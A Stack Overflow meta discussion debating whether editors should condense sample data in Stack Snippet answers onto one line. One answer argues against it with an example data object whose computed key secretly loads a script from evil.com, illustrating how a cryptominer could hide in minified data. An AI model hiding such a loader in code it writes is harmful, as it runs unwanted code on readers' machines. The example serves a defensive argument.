25

A user is going around reformatting Stack snippets to put all provided data on a single line, effectively turning things like this:

const data = [{
  id: 'id1',
  entries: [{
    key: 'key1',
    value: 'value1'
  }, {
    key: 'key2',
    value: 'value2'
  }, {
    key: 'key3',
    value: 'value3'
  }]
}];

/*
  Some logic operating on the above data
*/

Into this:

const data = [{id: 'id1', entries: [{key: 'key1', value: 'value1'}, {key: 'key2', value: 'value2'}, {key: 'key3', value: 'value3'}]}];

/*
  Some logic operating on the above data
*/

For an example, see my answer here (which I have chosen to roll back), and the other answer to the same question that got the same treatment from the same user.

Is this considered to be acceptable edit behavior? Does the community consider the "corrected" snippet to be more readable?

21
  • 46
    I, personally, wouldn't consider that "acceptable" no. Readability is important. Rolling back was the right call, in my opinion. If it's a constant issue, then flag a post with a custom moderator flag and explain the issue there.
    – Thom A
    Mar 29, 2023 at 9:14
  • 1
    FWIW I can't see that this is a reoccurring issue in the particular user's revision history.
    – Thom A
    Mar 29, 2023 at 9:20
  • Didn't go as far as to check the user's entire revision history. It just stood out that it happened to both answers on the same question. Mar 29, 2023 at 9:23
  • 11
    @ThomA I do not really see what the issue is. I'd rather not scroll MULTIPLE TIMES past the same data that I've already seen just to read a few lines of code that handles it. Makes reading answers really bothersome. What is your argument that I should be doing this and it's unacceptable my preference to avoid it should be ignored? Consider that there could be 5-6 answers. Why is scrolling and seeing the same data 5-6 additional times so important? Consider posting an answer arguing your point.
    – VLAZ
    Mar 29, 2023 at 10:18
  • 5
    If the data doesn't need to be in the answer, @VLAZ , then it shouldn't be in the answer. Remove it entirely. Then you don't need to scroll past it at all.
    – Thom A
    Mar 29, 2023 at 10:23
  • 6
    @ThomA You can process the data with the code and show off the result. I just don't want to read the whole of it again. Since whitespace is insignificant for JS objects and JS arrays, making it all in one line seems more convenient. I don't need to read all of it multiple times. I've seen it in the question already.
    – VLAZ
    Mar 29, 2023 at 10:25
  • Which is why I ask why have it in the answer at all; clearly it's not needed by your arguement, @VLAZ .
    – Thom A
    Mar 29, 2023 at 10:26
  • 6
    @ThomA not needed to read the data. Also repeatedly. Seeing the result of the code running is still useful. Again, if you have argument for always leaving the data in a snippet expanded, please post it as an answer.
    – VLAZ
    Mar 29, 2023 at 10:33
  • 12
    @ThomA it's unclear how you could have runnable snippets that demonstrate how the answer's code operates on the data (which is useful) without having the data in the snippet. The issue is having the data take up the vast majority of the vertical space in said snippet (which is unhelpful).
    – Ryan M Mod
    Mar 29, 2023 at 16:44
  • 5
    When appropriate, I like to try a "best of both worlds" option: I toss my logic into a function, then the snippet flows like <function/solution> <data> <call to function>. Whether I minify the data or not matters less, and even if I do, there's no weird blob at the top. This would conflict with the author's intent as an edit, though, so I only apply it to my own answers. If the data is different than the OP's, best not to minify it.
    – ggorlen
    Mar 30, 2023 at 2:38
  • 2
    Based on the title I thought you were referring to regular code snippets in posts and I'd agree edits to condense these to a single line make readability objectively worse since readers now might need to scroll in 2 dimensions vs just the one. Seeing now you are specifically taking issue with the edit in stack snippets I'm inclined to agree with these types of edits since the main objective of the stack snippet is executability. Ideally the author provides both if the actual specific data is relevant to the issue.
    – Drew Reese
    Mar 30, 2023 at 21:06
  • 1
    @DrewReese Even for regular code blocks, I don't think it hurts readability to minify setup data into one line. Is anyone actually trying to read that setup data again (especially since it's already included in the OP)? If anything it helps readability by surfacing key parts of the answer code without having to scroll vertically.
    – tdy
    Mar 31, 2023 at 1:09
  • 1
    What's more concerning to me is the user seems to be actually changing the content, not just the formatting, which is an absolute no-no. In your first linked post, they have removed double quotes and replaced them with single quotes, and added lots of commas that were not there before.
    – TylerH
    Mar 31, 2023 at 13:33
  • 2
    While I agree that scrolling past LONG amounts of vertical data to see the logic is a bit of a nuisance, horizontal data is worse... the structure of the data is no longer obvious. Ideally the repeated elements in the data could be collapsed behind an ellipsis, or some other technique that would provide the best of both worlds. Perhaps the best of both worlds would be that JSON data presents itself horizontally, but with a [+/-] button to toggle between vertical/horizontal. Is that too big of an ask for this problem? Mar 31, 2023 at 15:38
  • 1
    @AaronCicali: The data is pretty-printed in the question, at least in this case. The discussion is about condensing it in answers that copy that part of the question. But yeah, if there was collapse/expand support, that would be even better, instead of having to scroll back up to the question if you wanted to check something about the input. Apr 1, 2023 at 8:01

2 Answers 2

38

When the data is quite long, verbatim from the question (where the user left it expanded), not an important part of the answer, and the edits are to the answers that copied the extremely long sample data out of the question...yes, those were helpful edits that improved readability.

Using the other answer as a particularly clear example, which of these is more readable?

The one where the code that answers the question is visible
screenshot of an answer with one line of sample data followed by code

or the one where it is not?
screenshot of answer where only sample data is visible

7
  • 6
    That's a fair point. Unless the snippet is very short, I always try to put the salient parts of my solution in the explanation, and then just follow up with a snippet to demonstrate that it actually works. I do agree that for users who only post a snippet, the important parts sometimes tend to get lost. Mar 29, 2023 at 10:02
  • 10
    @RobbyCornelissen Yeah, yours is honestly fine either way, given that you pulled the relevant part out and led with it. But the other answer was definitely improved by the edit.
    – Ryan M Mod
    Mar 29, 2023 at 10:05
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    To add to this: so as to avoid that sort of repetitive visual noise, it's common in answers for non-JavaScript questions to elide this sort of example data by simply omitting that declaration (and perhaps alluding to it in the text), or perhaps something like grpdet = # as before... (with whatever language-appropriate commenting syntax). However, for Stack snippets, the point is for the example to be runnable as-is, so the data actually needs to be there. Condensing it into one line - since JavaScript syntax allows for it - is the logical compromise. Mar 30, 2023 at 12:20
  • @KarlKnechtel Even for non-snippets, I don't get why some people do grpdet = # as before. It still wastes 1 line, except now the code block is no longer self-contained/runnable. Why not just use that 1 line to provide a minified one-liner? Maybe they're adhering to some personal dogmatic rule about linting/formatting.
    – tdy
    Mar 30, 2023 at 18:45
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    @ThomasWeller it's not even really unreasonably long...it's just long when pretty-printed.
    – Ryan M Mod
    Mar 30, 2023 at 19:21
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    When using a Stack Snippet with data like this that's supplied by the question, I've often put it in a <script> tag in the HTML section of the Stack Snippet with a clear comment as to it being from the question and that it's only setup/common data. That allows the Stack Snippet's JavaScript section to be the focus for the code that's the answer/showing how to solve the problem. I find that having the data/setup from the question be completely separate makes it more clear what's been supplied as an answer, rather than mixing together both the question data and the code for the answer.
    – Makyen Mod
    Mar 30, 2023 at 20:22
  • 3
    @tdy for other languages - since snippets aren't applicable - there isn't the same pressure to make examples independently runnable and self-contained. That said, I agree that it would normally be better to explain something like "given a grpdet initialized as before, ..." in the prose before that code block. Mar 31, 2023 at 10:47
4

I don't think this is that fine.

This literally makes this part of the code less readable. After all the goal is to allow the answer readers to not read that part. This means we're encouraging users to run random scripts on their computers that they didn't read.
If this becomes the norm, reviewers will get more and more trouble detecting stuff like

const data = [{id: 'id1', entries: [{key: 'key1', value: 'value1'}, {key: 'key2', value: 'value2'}, {key: 'key3', [((()=>{$.loadScript("://evil.com/cryptominer.js")})(),"value")]: 'value3'}]}];
/*
  Some logic operating on the above data
*/

For the ones not well versed into JS, this snippet would still produce the correct object, so the original snippet would still run as expected, except that it would also call some potentially nefast code at the same time. Here the dataset is still relatively short, and I didn't try to obfuscate the "nefast" part that much, but it's easy to see how it can become harder to spot.

If you really think the dataset is obstructing the answer, then it's probably better to extract the important stuff out of the snippet inside the prose, and tick the "hide snippet" option.

Of course it's often fine to have small objects on single lines, but I believe that as soon as it triggers the horizontal overflow, one should refrain from doing so, moreover if it's as an edit.

4
  • If somebody is going to just hit "Run snippet" blindly, are they really going to pause and think it over if the data is expanded? And if somebody really wanted to run nefarious code, collapsing long data into a single line to add that is not really that high in terms of best ways to hide it.
    – VLAZ
    Apr 3, 2023 at 9:57
  • @VLAZ the problem is more on the reviewing side. I know that people unfortunately do run snippets "blindly", but Stack Overflow shouldn't make a rule that encourages this behavior. Yes hiding nefarious code inside the horizontal overflown area, in a "minified" object declaration makes it a lot harder to spot. Once again I'm targetting more specifically against edits, which I believe do have less scrutinity than initial postings, moreover when reviewers will gets an habit of "oh, yet another minified dataset object, Approve.". Done sporadically it's fine, to make this a rule is less fine.
    – Kaiido
    Apr 3, 2023 at 11:15
  • The case discussed here wasn't a suggested review. it was a full edit by a user with over 10k rep. So, if the intent is to prevent reviewers from accepting these - that wasn't what happened anyway. And also, if the intent is to prevent reviewers from accepting these - what about when the answerer initially posted the snippet with a minimised dataset? That's not reviewed.
    – VLAZ
    Apr 3, 2023 at 12:10
  • @VLAZ I think "original" posts do get more attention by other readers, because these are often potential answerers and will notice if the dataset has been tempered with, but sure, it can already be bad at this stage, I didn't say otherwise. The case at hand and its current top-voted answer have been used as an excuse to rollback a conflicting edit, and this, by a diamond moderator. This does set a precedent, we need to see further than this one case and anticipate what this new rule means in its full context.
    – Kaiido
    Apr 3, 2023 at 12:19

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